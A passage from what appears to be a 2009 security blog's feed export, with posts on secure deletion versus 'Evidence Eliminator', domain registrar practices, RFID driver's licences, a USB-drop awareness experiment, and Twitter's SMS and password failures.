<p>If our operating systems and applications were designed with privacy in mind, we could simply tell them that we don’t want to retain any browsing history, that our web cache and cookies should be deleted when we close our browser, that we aren’t interested in being presented with a list of our most recently used files, and that the last date/time a file was read isn’t necessary information.  We could also tell it to overwrite disk space when it’s done with it.</p>
<p>The technical reasons behind some of these issues were originally performance related, but given the speed of computers these days, there is no good reason that our computer needs to keep notes on what we’ve been using it for.</p>
<p>Of course when one brings up these issues, there are those who ask, “What do you have to hide?”  Child pornography is an often-quoted example of why computer forensics is a good thing, and I certainly agree that child pornographers should receive an express ticket to jail (or worse).  But I’m not willing to give up fundamental privacy rights and live in digital glass houses in order to make it easier to catch criminals.</p>
<p>I’ve written before about hard drive encryption, and full drive encryption remains the best way to safeguard your privacy.  The enhanced BitLocker functionality in Windows 7, combined with the TPM chip in many new computers, is a move in the right direction. The open source TrueCrypt project is great, but they need to quickly adapt to new realities in Windows 7.</p>
<p>Self-encrypting hard drives appear to be a promising technology, but while vendors brag about them, they aren’t readily available and technical information remains marginal at best. If &#8212; as a security professional and writer &#8212; I can’t get my hands on one to test, I have to conclude that they’re not a viable option at this time.</p>
<p>Then there are software products that perform tasks such as wiping free space and deleting unwanted browser histories.  From a functional security perspective, products like Evidence Eliminator can perform a nice clean-up of your computer, deleting temporary files, browser artefacts, and wiping unused hard drive space to eliminate ‘deleted’ data.  But “Evidence Eliminator” is a really bad idea.</p>
<p>From a security perspective, this product (and to be fair many others in the same category) often creates a bigger problem than it solves:  While they do a good job of removing unwanted data, they also do a fantastic job of creating evidence that you ran “Evidence Eliminator”. It’s quite amusing to read of people attempting to explain in court that they didn’t delete data pertaining to the matter in front of the court when they ran “Evidence Eliminator”.  By definition, if you’re eliminating evidence, you look guilty.</p>
<p>Ironically, by calling the product “Evidence Eliminator”, the vendor has made performing clean-up tasks that may be quite reasonable in many circumstances look like a criminal act.</p>
<p>Imagine you’re at work and someone you know emails a URL.  You download a file you expect contains something humorous and end up with porn on your work computer.  Sure, we can discuss why you shouldn’t have downloaded it in the first place, but there are countless scenarios that could result in you having some type of data on your drive that you don’t want.</p>
<p>In the physical world, you could toss it in the shredder bin, take it home and put it in the fireplace, or otherwise dispose of it. We should have the same ability with data.  But it’s just real deletion that we want, not evidence elimination.</p>
<p>On the off chance that enterprising developers are reading, there are two products missing from the market – or at least I can’t find them!</p>
<p>The first is a clean-up product that runs entirely from a USB stick and does not require installation on the PC.  Running it would clean up the hard drive, overwrite browser artefacts, temporary files, wipe free hard drive space, etc. In fact, it would do most of the things that Evidence Eliminator does – except the purpose would be to clean up the computer and protect privacy – not destroy evidence.</p>
<p>The second is an installable package that monitors system use and cleans up after the user automatically.  In short, it would protect privacy by doing what the operating system and applications should offer to do by themselves: really deleting stuff.</p>
<p>Thoughts?  Questions?  Ideas?</p>
<p>Let’s hear ‘em!</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/09/01/evidence-eliminator-is-a-bad-idea/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Financial Fraud and Internet Banking</title>
		<link>http://jacksch.com/2009/08/24/financial-fraud-and-internet-banking/</link>
		<comments>http://jacksch.com/2009/08/24/financial-fraud-and-internet-banking/#comments</comments>
		<pubDate>Mon, 24 Aug 2009 12:00:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3749</guid>
		<description><![CDATA[McAfee recently released a comprehensive report on the array of threats facing banks and their customers.  It includes topics such as card skimming, money laundering, the Nigerian 419 fraud, auctions, and online banking.  The report also provides a good overview of current countermeasures. Highly recommended reading! The full report is available for download here.]]></description>
			<content:encoded><![CDATA[
<p>McAfee recently released a comprehensive report on the array of threats facing banks and their customers.  It includes topics such as card skimming, money laundering, the Nigerian 419 fraud, auctions, and online banking.  The report also provides a good overview of current countermeasures.</p>
<p>Highly recommended reading!</p>
<p>The full report is <a href="http://www.mcafee.com/us/local_content/reports/6168rpt_fraud_0409.pdf" target="_blank">available for download here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/08/24/financial-fraud-and-internet-banking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Computer security for the average user</title>
		<link>http://jacksch.com/2009/08/17/computer-security-for-the-average-user/</link>
		<comments>http://jacksch.com/2009/08/17/computer-security-for-the-average-user/#comments</comments>
		<pubDate>Mon, 17 Aug 2009 12:00:27 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3722</guid>
		<description><![CDATA[As a security professional, I spend a lot of my time contemplating how to manage security risk in the corporate and government space.  But there is another challenge that greatly interests me:  Protecting the average user. Unless you have an IT guy or gal in the family, it can be hard to get the right [...]]]></description>
			<content:encoded><![CDATA[
<p>As a security professional, I spend a lot of my time contemplating how to manage security risk in the corporate and government space.  But there is another challenge that greatly interests me:  Protecting the average user.</p>
<p>Unless you have an IT guy or gal in the family, it can be hard to get the right information.  And there are definitely challenges.  For example, check out Justin Foster’s blog post on <a title="http://www.developingsecurity.com/weblog/2009/07/keeping-granny-safe-online-1.html" href="http://www.developingsecurity.com/weblog/2009/07/keeping-granny-safe-online-1.html" target="_blank">Keeping Granny Safe</a>.</p>
<p>One of the great tidbits in it is the link to Secunia’s free <a title="http://secunia.com/vulnerability_scanning/" href="http://secunia.com/vulnerability_scanning/">vulnerability scanners</a> for home users.  They offer both a web-based and a downloadable package.  I installed the latter on my notebook and it quickly identified a few products on my computer that needed updating.</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/08/17/computer-security-for-the-average-user/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The great security lie</title>
		<link>http://jacksch.com/2009/08/10/the-great-security-lie/</link>
		<comments>http://jacksch.com/2009/08/10/the-great-security-lie/#comments</comments>
		<pubDate>Mon, 10 Aug 2009 12:00:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3716</guid>
		<description><![CDATA[I’ve been reading up on new products lately and there are certainly some interesting ones out there. But what’s also interesting is that many vendors still include the great security lie in their product literature.  Sometimes it’s up front, sometimes it’s buried, but it’s easy to spot because it contains a phrase like, “absolutely secure”, [...]]]></description>
			<content:encoded><![CDATA[
<p>I’ve been reading up on new products lately and there are certainly some interesting ones out there. But what’s also interesting is that many vendors still include the great security lie in their product literature. </p>
<p>Sometimes it’s up front, sometimes it’s buried, but it’s easy to spot because it contains a phrase like “absolutely secure”, “totally secure”, “completely secure”, or “military-grade security”.</p>
<p>If a car salesman told us that a model is “totally safe” wouldn’t we just laugh? Why is software somehow different?</p>
<p>Share your questions, views and concerns – comment below or click on “Ask TLP” at the top of the page!</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/08/10/the-great-security-lie/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Domain registration: Caveat Emptor</title>
		<link>http://jacksch.com/2009/07/27/domain-registration-caveat-emptor/</link>
		<comments>http://jacksch.com/2009/07/27/domain-registration-caveat-emptor/#comments</comments>
		<pubDate>Mon, 27 Jul 2009 12:00:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3688</guid>
		<description><![CDATA[The Internet has been around so long that domain registrations have become a commodity.  The competition is fierce, and margins are small. Registrars compete for your business not only on price, but also on added features like bundled hosting and DNS service. And among the sales tactics is the offer of free domain registrations. The [...]]]></description>
			<content:encoded><![CDATA[
<p>The Internet has been around so long that domain registrations have become a commodity.  The competition is fierce, and margins are small. Registrars compete for your business not only on price, but also on added features like bundled hosting and DNS service. And among the sales tactics is the offer of free domain registrations.</p>
<p>The reality, of course, is that there is no such thing as a free domain registration.  Somebody pays for it.  And while there is nothing wrong with giving a customer a “free” domain when they purchase other services, as one of my colleagues recently found out, ethics among hosting services greatly vary.</p>
<p>My colleague purchased a hosting plan for $5.95 per month with HostPapa.ca that included a free domain.  According to the terms of service posted on their web site, there shouldn’t have been a problem:</p>
<blockquote><p>“You have all rights to transfer, sell, or modify your domain name to another person or individual. If you decide to sell or transfer your domain name and HostPapa is the domain name registrar, please request our &#8220;domain name transfer instructions&#8221; by sending an email to <a href="mailto:support@hostpapasupport.com">support@hostpapasupport.com</a>. We will send you the specific details and information about transfer of ownership.”</p></blockquote>
<p>But, when my colleague decided to transfer his domain to another registrar, he found out that it wasn’t that straightforward.  HostPapa had registered the domain in their own name.  In email, he was told,</p>
<blockquote><p>“The $100.17 you paid upon sign up with HostPapa was for a hosting account. We included a FREE domain as a thank you for creating an account with us. This domain is only free as long as you are a HostPapa customer, hosting the domain on our servers.</p>
<p>If the domain was not free, you would have been charged $126.37 for hosting and a domain purchase. Now that you wish to cancel your services and take your domain away, the invoice I have created for your domain in the amount of $26.20 covers the cost of HostPapa registering this domain on your behalf when you signed up with us.</p>
<p>This is standard for anyone cancelling their account and wishing to retain their domain.”</p></blockquote>
<p>During his email discussion with them, at one point a representative of HostPapa wrote chillingly, “Legally, the domain name is ours.”</p>
<p>We contacted HostPapa and inquired, and they explained,</p>
<blockquote><p>“Yes, you can transfer your domain name to another host at a later date, however, there will be a fee of $24.95 + GST for Canadian clients to release the domain, since it&#8217;s only free as long as you are hosted by us.”</p></blockquote>
<p>Your domain name is key to your Internet presence, and losing it can have a significant impact.  Assuming you maintain a backup of your web site, you can easily move to another hosting company if you control your domain.</p>
<p>So what can you do to protect yourself?</p>
<p>First, keep in mind that virtually anyone can become a ‘registrar’ through a simple reseller agreement. The fact that a company can register a domain for you doesn’t provide any indication of business ethics. Search the web, read their agreements carefully, and do your best to check out their reputation.  Be cautious if transferring your domain requires emailing or telephoning support, or if the description of the process is vague.</p>
<p>Second, check your domains to ensure that they are registered in your (or your company’s) name, not a provider’s.  If you don’t already have a favourite “whois” tool or web site, try <a title="http://www.allwhois.com/" href="http://www.allwhois.com/">allwhois.com</a>. If the domain is not in your name, contact the registrar immediately and ask that it be corrected. If they refuse, indicate that you wish to transfer your domain to another registrar. But keep in mind that as far as the domain registration world is concerned, the owner is the entity listed in the whois database.</p>
<p>Third, consider using a separate registrar from your hosting provider.  If you’re more technically inclined and have a number of domains, you might consider opening your own reseller account with a large registrar like Tucows and becoming your own registrar.  It also might make sense for you to use a third-party DNS provider like <a href="http://dnsmadeeasy.com">dnsmadeeasy.com</a>.  Ideally you want control of your domain information including the contact names, addresses, and DNS servers. Your registrar should allow you to update at least your DNS information through a web-based interface.</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/07/27/domain-registration-caveat-emptor/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Protecting Corporate Assets</title>
		<link>http://jacksch.com/2009/07/13/protecting-corporate-assets/</link>
		<comments>http://jacksch.com/2009/07/13/protecting-corporate-assets/#comments</comments>
		<pubDate>Mon, 13 Jul 2009 11:00:40 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3678</guid>
		<description><![CDATA[Non-profits, co-ops, and other organizations that depend upon volunteers often have challenges when it comes to protecting corporate information assets against individuals who leave the organization.  For example, I&#8217;ve recently been dealing with a situation involving the use of Yahoo Groups.  While it&#8217;s a great way to share information with a group of people, here&#8217;s [...]]]></description>
			<content:encoded><![CDATA[
<p>Non-profits, co-ops, and other organizations that depend upon volunteers often have challenges when it comes to protecting corporate information assets against individuals who leave the organization. </p>
<p>For example, I&#8217;ve recently been dealing with a situation involving the use of Yahoo Groups.  While it&#8217;s a great way to share information with a group of people, here&#8217;s what can happen:</p>
<ol>
<li>A volunteer sets up a group on behalf of the corporation, bearing the corporate name.</li>
<li>The volunteer runs the group for a while but subsequently decides to leave the role.</li>
<li>The volunteer refuses to turn over control of the group to a board member.</li>
<li>When pressed on the issue, the volunteer claims that the group is inaccessible because it hasn&#8217;t been used for a while.</li>
<li>When pressed further, the volunteer deletes the group including all content.</li>
</ol>
<p>Unethical volunteers (and employees) can create disruptive scenarios. In this case, they have the potential to impact communication with group members and information can be quickly lost. While criminal and civil proceedings can be initiated after the fact, the disruption has already occurred. </p>
<p>In an ideal world, there would be services available that take these issues into account. For example, one could have multiple administrators and require two of them to approve sensitive transactions.  But until services like that exist, your best defence is to recognize what can happen, and to ensure that someone other than the group administrator has a copy of all documents and maintains a list of participants&#8217; email addresses so that they can be contacted if an issue arises.</p>
<p>Have another suggestion?  Please comment and let me know!</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/07/13/protecting-corporate-assets/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PCI Security Presentation</title>
		<link>http://jacksch.com/2009/06/22/pci-security-presentation/</link>
		<comments>http://jacksch.com/2009/06/22/pci-security-presentation/#comments</comments>
		<pubDate>Mon, 22 Jun 2009 12:00:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/2009/06/29/pci-security-presentation/</guid>
		<description><![CDATA[There’s a lot of information about the Payment Card Industry Data Security Standard (PCI DSS) on the Internet, but if you’re looking for a good overview, check out eNable’s Quick Guide to PCI Compliance video.  Their fifteen minute presentation is both technically correct and presented in language that anyone can understand – a refreshing change [...]]]></description>
			<content:encoded><![CDATA[
<p>There’s a lot of information about the Payment Card Industry Data Security Standard (PCI DSS) on the Internet, but if you’re looking for a good overview, check out <a href="http://www.enablebusol.com/html/pci_flash.html" target="_blank">eNable’s Quick Guide to PCI Compliance video</a>.  Their fifteen minute presentation is both technically correct and presented in language that anyone can understand – a refreshing change from many security presentations.</p>
<p>If you accept credit cards, you’re required to comply with the PCI DSS standard. There are ways to simplify PCI compliance requirements, especially for small businesses, but it all starts with understanding what those requirements are.  If your business accepts credit cards, you owe it to yourself to watch this video.</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/06/22/pci-security-presentation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What is security?</title>
		<link>http://jacksch.com/2009/06/15/what-is-security/</link>
		<comments>http://jacksch.com/2009/06/15/what-is-security/#comments</comments>
		<pubDate>Mon, 15 Jun 2009 12:00:37 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3626</guid>
		<description><![CDATA[One of the reasons that security programs aren’t always as effective as they should be is that organizations of all sizes often fail to ask the most important question: What is security? Security is often categorized as physical security, personnel security and information security. Much of the reason is historical.  Back before computers, corporate security [...]]]></description>
			<content:encoded><![CDATA[
<p>One of the reasons that security programs aren’t always as effective as they should be is that organizations of all sizes often fail to ask the most important question: What is security?</p>
<p>Security is often categorized as physical security, personnel security and information security. Much of the reason is historical.  Back before computers, corporate security people were concerned primarily with physical assets.  The area of personnel security evolved with background checks and security clearances and then expanded into workplace violence prevention and ensuring the safety of employees at work and when they travel.</p>
<p>Then computers came along, and the complexity of these new systems gave birth to “computer security”.  Over time the “computer” field became known as “information technology” and “computer security” became “information technology security”.  Some time after that it finally dawned on people that the focus should be protecting information (as opposed to “information technology”) and since then the term “information security” has increased in popularity.</p>
<p>Within the information security field, the buzz phrase “Confidentiality, Integrity, and Availability” describes its goals:  Protecting information against unauthorized disclosure, ensuring that it is not inappropriately modified, and making sure that authorized users can actually use it.  Every so often somebody (commonly a vendor representative trying to push their product) tries to expand this definition by adding a fourth or fifth goal, but in doing so they usually succeed only in proving that they don’t understand information security.</p>
<p>In some organizations different people or groups are responsible for different “types” of security.  They often use different language, different processes and their failure to co-ordinate activities often increases security risks.</p>
<p>So what is this security thing anyway?  Security is simply about protecting assets.</p>
<p>Physical security is about protecting company assets.  But so is personnel security.  While I’m certainly not suggesting that a company owns employees, they are assets.  Their ability and willingness to work is of great value to the company – without them very little could get done.  If a company fails to protect employees, and they are unable to work, that constitutes a loss.  Failure to comply with laws and regulations regarding the protection of employees also impacts other assets including employee and public relations and monetary losses due to fines or civil damages. All political correctness aside, employees are valuable assets that require protection.</p>
<p>Finally, there’s “information security”.  Today information is an asset.  While computers and networks can be complex, and different skills are required to protect digital information, in the end it’s all really just about protecting assets.</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/06/15/what-is-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The human firewall</title>
		<link>http://jacksch.com/2009/06/08/the-human-firewall/</link>
		<comments>http://jacksch.com/2009/06/08/the-human-firewall/#comments</comments>
		<pubDate>Mon, 08 Jun 2009 12:00:23 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3612</guid>
		<description><![CDATA[During the last decade a lot of money has been spent trying to protect information systems. Firewalls, intrusion detection systems, two-factor authentication and other technical controls sometimes make good business sense when applied as part of a comprehensive security program.  But what we’re not good at yet is the human firewall. Scott Wright, an Ottawa-based security [...]]]></description>
			<content:encoded><![CDATA[
<p>During the last decade a lot of money has been spent trying to protect information systems. Firewalls, intrusion detection systems, two-factor authentication and other technical controls sometimes make good business sense when applied as part of a comprehensive security program.  But what we’re not good at yet is the human firewall.</p>
<p>Scott Wright, an Ottawa-based security consultant and publisher of <a href="http://www.securityviews.com" target="_blank">securityviews.com</a> explained,</p>
<blockquote><p>“Despite having spent 12 years working with constantly improving security technologies, I&#8217;ve seen an increasing trend toward generally greater risk and losses to businesses and home computer users. All signs point to the human factors as being the weakest link. It doesn&#8217;t matter how well you make the valve in a rubber tire to keep the air in, if the rubber is not consistently good quality, it can be easily punctured. So, I felt that it was important to start working on this problem in an innovative way that had a chance of making a difference in effecting cultural change across an entire organization.”</p></blockquote>
<p>In addition to speaking and writing on security awareness, Wright also conducted some interesting research:</p>
<blockquote><p>“The Honey Stick Project was originally devised as a way to gather data about how well people handled a simulated risk scenario &#8211; that of an infected USB Flash Drive. Because these devices can contain targeted threats or viruses that can evade common anti-virus programs, people should not plug unidentified USB drives they find in public locations into their computers at work or at home. In fact, it&#8217;s a good idea to only use your own device, and not share it with other people, to reduce the risk of infection.</p>
<p>The devices contain simple and safe HTML files with no active programs. I rely on people simply double-clicking on a file when the device is plugged into their computer to load the file. As long as they are connected to the Internet, and the user hasn&#8217;t taken any precautions to prevent the browser from starting, an event is logged at my web server. After deploying 50 devices in places like Ottawa, Toronto, Tremblant and Las Vegas, over 60% of them have been used, which indicates that the finder didn&#8217;t do anything to prevent their computer from becoming infected. This tells me that at least 60% of the people who find these devices make poor risk decisions that could result in their home or office computer becoming infected with a virus or botnet.”</p></blockquote>
<p>Perhaps it’s time we put more emphasis on security awareness training?</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/06/08/the-human-firewall/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Driver&#8217;s Licence with RFID &#8211; A bad idea</title>
		<link>http://jacksch.com/2009/06/01/drivers-licence-with-rfid-a-bad-idea/</link>
		<comments>http://jacksch.com/2009/06/01/drivers-licence-with-rfid-a-bad-idea/#comments</comments>
		<pubDate>Mon, 01 Jun 2009 11:00:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3593</guid>
		<description><![CDATA[Starting today, Passports or Enhanced Driver&#8217;s Licences will be needed to drive across the Canada/US border. I don&#8217;t have any issue with requiring proof of identity and citizenship to cross an international border, and I really like the concept of offering a wallet-size alternative to the passport. But adding RFID to that wallet-sized card is [...]]]></description>
			<content:encoded><![CDATA[
<p>Starting today, Passports or Enhanced Driver&#8217;s Licences will be needed to drive across the Canada/US border. I don&#8217;t have any issue with requiring proof of identity and citizenship to cross an international border, and I really like the concept of offering a wallet-size alternative to the passport. But adding RFID to that wallet-sized card is a bad idea.</p>
<p>If you&#8217;re a Canadian citizen, reside in Ontario, and have a driver&#8217;s licence you now have the option of paying an additional $40, attending an interview, and obtaining an Enhanced Driver&#8217;s Licence that will be accepted in lieu of a passport when driving across the border. Within the card is an RFID chip so that you can hold it up to a reader, and by the time you reach the border agent they&#8217;ll have your information on their screen. According to the Government of Ontario web site, the RFID chip only sends a unique identifier and not your personal information. The Canadian and US governments then allow each other to access their databases. Using a unique identifier is much better than, for example, allowing anyone with an RFID reader to directly obtain your name, address, etc. However, those citizens who choose to obtain an Enhanced Driver&#8217;s Licence will be carrying an RFID chip with them almost everywhere they go. And it can be read at least 10m away by anyone with the right equipment.</p>
<p>Today the technology is new, readers are expensive and few people have the cards. But imagine what might happen if they become popular in a few years:</p>
<p>On Sundays, you go to your favourite store. The RFID reader at the door logs your entrance, and readers strategically located around the store track your movement. You pay for your purchase with cash, but a reader at the register associates your unique identifier with the details of your purchase. A few months later you don&#8217;t have cash with you and you use your credit card. Now they add your name. The next week they&#8217;re taking a survey and ask your postal code, and it is added to the database. A year goes by and in a moment of weakness you fill in an application for a store loyalty card. The information you supply is added to the database. Later the store is purchased by another company that also has a customer database, and they combine the data.</p>
<p>What we often fail to consider is that the ability to uniquely identify an individual allows us to build a database and leverage that information both before and after the event. In many cases we choose to provide information, and that&#8217;s ok. But adding technology that allows anyone with an RFID reader to start collecting it is a bad idea.</p>
<p>Personally, I&#8217;ll stick to my passport and only carry it when I travel.</p>
<p>What&#8217;s your plan?</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/06/01/drivers-licence-with-rfid-a-bad-idea/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Pandemic Planning – This one or the next?</title>
		<link>http://jacksch.com/2009/05/25/pandemic-planning-%e2%80%93-this-one-or-the-next/</link>
		<comments>http://jacksch.com/2009/05/25/pandemic-planning-%e2%80%93-this-one-or-the-next/#comments</comments>
		<pubDate>Mon, 25 May 2009 12:00:58 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3567</guid>
		<description><![CDATA[I’ve been avoiding writing about pandemic planning for a while because there has simply been too much hype.  But there is a positive side to all this:  Companies, through their pandemic planning, are hopefully making workplaces safer and taking a look at their business continuity plans. Every year we have “flu season”.  And every year [...]]]></description>
			<content:encoded><![CDATA[
<p>I’ve been avoiding writing about pandemic planning for a while because there has simply been too much hype.  But there is a positive side to all this:  Companies, through their pandemic planning, are hopefully making workplaces safer and taking a look at their business continuity plans.</p>
<p>Every year we have “flu season”.  And every year we have people show up at work with the flu as if doing so displays their dedication.  In reality, they’re spreading a virus to their colleagues. Hopefully employers are looking at the bigger picture and making simple policies such as prohibiting employees with a fever from entering any company facility.</p>
<p>The larger picture is business continuity planning.  There are countless reasons why employees may not be able to come to the workplace:  Illness (the employee, a family member or fear of contact with ill colleagues), power failures, protests, floods, severe weather and other natural disasters. While firms in the manufacturing sector may have to shut down, many others could, with the right planning, sustain operations with employees working remotely.</p>
<p>How well prepared is your company?</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/05/25/pandemic-planning-%e2%80%93-this-one-or-the-next/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Learning from Mistakes</title>
		<link>http://jacksch.com/2009/05/11/learning-from-mistakes/</link>
		<comments>http://jacksch.com/2009/05/11/learning-from-mistakes/#comments</comments>
		<pubDate>Mon, 11 May 2009 12:30:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3524</guid>
		<description><![CDATA[There’s a great poster over at Despair Inc. that reads, “It could be that the purpose of your life is only to serve as a warning to others.” In the security field we strive to keep our employers and clients out of that category.  However, reality is such that we often learn best from our mistakes [...]]]></description>
			<content:encoded><![CDATA[
<p>There’s a <a href="http://despair.com/mis24x30prin.html" target="_blank">great poster over at Despair Inc.</a> that reads,</p>
<blockquote><p>“It could be that the purpose of your life is only to serve as a warning to others.”</p></blockquote>
<p>In the security field we strive to keep our employers and clients out of that category.  However, reality is such that we often learn best from our mistakes and those of others.  As any parent can attest, even the best warning about the potential danger involved in a childish act of stupidity doesn’t come close to the educational impact of falling, or watching one’s friend fall, flat on their face.</p>
<p>Last week I wrote about a security breach at Twitter that resulted from a poor security design.  The kindest thing I can say is that Twitter managed to ignore more than thirty years of security knowledge and made a design error that I would expect a junior security consultant to pick up in a matter of minutes.</p>
<p>Don’t get me wrong &#8212; I’m a huge fan of Twitter.  The basic concept behind their service isn’t new, but their timing, marketing and some of their technical decisions are brilliant. But, as much as it pains me to say this about any company, they are making the same critical mistake that has plagued many startups in the Internet space: They obviously lack competent security expertise.</p>
<p>I’m sure that they mean well, and I’m sure Twitter has some very talented developers that really want to do the right thing.  I’m sure that they have considered some aspects of security.  But they need more.  They need a security pro sitting around the development table.  They need to critically examine every aspect of their system from a security perspective.  And they desperately need a good security risk assessment.</p>
<p>Take, for example, my experience with Twitter last week. On Tuesday they announced the ability to send updates via SMS to Rogers phones. I found out because my phone suddenly started getting SMS messages. I replied with “off” and it stopped.  Wednesday the exact same thing happened again.  “Off” worked, and I logged in via the web to make sure it was really turned off. </p>
<p>Thursday morning it was back with a vengeance. I was driving to the office and a flood of messages began.  Having worked on an SMS project, I knew that mobile phone companies require systems that use SMS to honour the ‘stop’ command.  As soon as a mobile phone subscriber sends ‘stop’ the service provider is supposed to reply with an acknowledgement and not send any further messages.  So I replied with ‘stop’.  Twitter sent an acknowledgement, but messages continued to flood in.  At first I assumed there must be a queue somewhere, but an hour later I was still being flooded with so many messages that my phone was almost useless.</p>
<p>I logged into Twitter and tried to turn off the SMS updates.  But the system gave me an error and continued to show the updates as ‘on’.  Next I tried to delete the phone.  Given that the Twitter ‘Devices’ page displayed my mobile phone number, that should have been easy.  But in response to the ‘delete’ button Twitter replied that there was no valid device to delete.</p>
<p>I opened a support case and while waiting found that the ‘sleep’ function would still work. I temporarily managed to get messages under control by telling Twitter that I sleep 23 hours per day.  About 10 hours into the incident, I received a reply from Twitter support indicating that they couldn’t resolve the issue and had escalated it.  Some time after that they managed to delete my phone from the system.</p>
<p>From a security perspective, a few things went wrong.  First and foremost, the system is clearly not designed to gracefully handle database inconsistencies.  I don’t know how Twitter’s database works.  Presumably it’s large and complex due to the sheer volume of data it handles.  But if the system can display your telephone number and not delete it, something is very wrong.</p>
<p>In a perfect world, databases maintain internal consistency.  But we don’t live in a perfect world, and all sorts of strange things can happen in a database.  From a security perspective (as well as an operational one), we need to accept this fact and design for it.</p>
<p>When it comes to any type of communications system, we must recognize that system failures do occur.  For example, radio systems often have timers to shut down the transmitter in the event that a person, computer, or stuck microphone attempts to transmit for a long period of time. When designing an SMS gateway, we similarly need to recognize that database issues or queuing problems could potentially result in a large quantity of undesired messages being sent to a mobile phone.  To protect both the organization and the user, the system should be designed to tolerate these failures gracefully.  And when the user sends ‘stop’, the system must ensure that the messages do indeed stop.</p>
<p>Then there’s the helpdesk issue.  Twitter is a free service, and we all understand that free services can’t always provide immediate technical support.  But Twitter doesn’t give the user any way to indicate the severity of the issue.  A ten hour response time to most support requests is fine – but when Twitter is malfunctioning and slamming a user with SMS messages it is woefully inadequate.</p>
<p>Part of a security risk assessment involves asking difficult questions about internal and external threats.  It requires considering what can go wrong and determining the potential consequences. It involves exploring scenarios like, “What happens if one of our executive’s email accounts is hacked?” and “What could cause the system to go berserk and start flooding users with messages?”</p>
<p>Good security is about much more than checking a user’s password.  It’s about achieving a holistic understanding of the system&#8217;s confidentiality, integrity and availability properties.  It’s about understanding what can go wrong and how to design and operate  the system to minimize the risk. And ultimately it is about protecting the organization’s bottom line.</p>
<p>If Twitter wants to avoid serving as a warning to others, they need to start taking security much more seriously.  They need to find about $50,000 in their budget for a proper risk assessment.  Then they need to start incorporating security requirements into their software development lifecycle. Investors may be desperate for a good start-up these days, but they understand that security breaches, especially those that reveal questionable security competencies, are bad for business. And in the fickle world of social media, they can be fatal.</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/05/11/learning-from-mistakes/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Passwords – When will we ever learn?</title>
		<link>http://jacksch.com/2009/05/04/passwords-%e2%80%93-when-will-we-ever-learn/</link>
		<comments>http://jacksch.com/2009/05/04/passwords-%e2%80%93-when-will-we-ever-learn/#comments</comments>
		<pubDate>Mon, 04 May 2009 12:00:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3516</guid>
		<description><![CDATA[Twitter was abuzz again last week due to another security breach.  In summary, a criminal claims to have obtained access to a Twitter administrator&#8217;s Twitter password by guessing the secret question to reset the administrator&#8217;s password on a Yahoo e-mail account. Twitter confirmed that the intruder gained access to information on ten accounts including [...]]]></description>
			<content:encoded><![CDATA[
<p>Twitter was abuzz again last week due to another security breach.  In summary, a criminal claims to have obtained access to a Twitter administrator&#8217;s Twitter password by guessing the secret question to reset the administrator&#8217;s password on a Yahoo e-mail account. Twitter confirmed that the intruder gained access to information on ten accounts including those of some celebrities.</p>
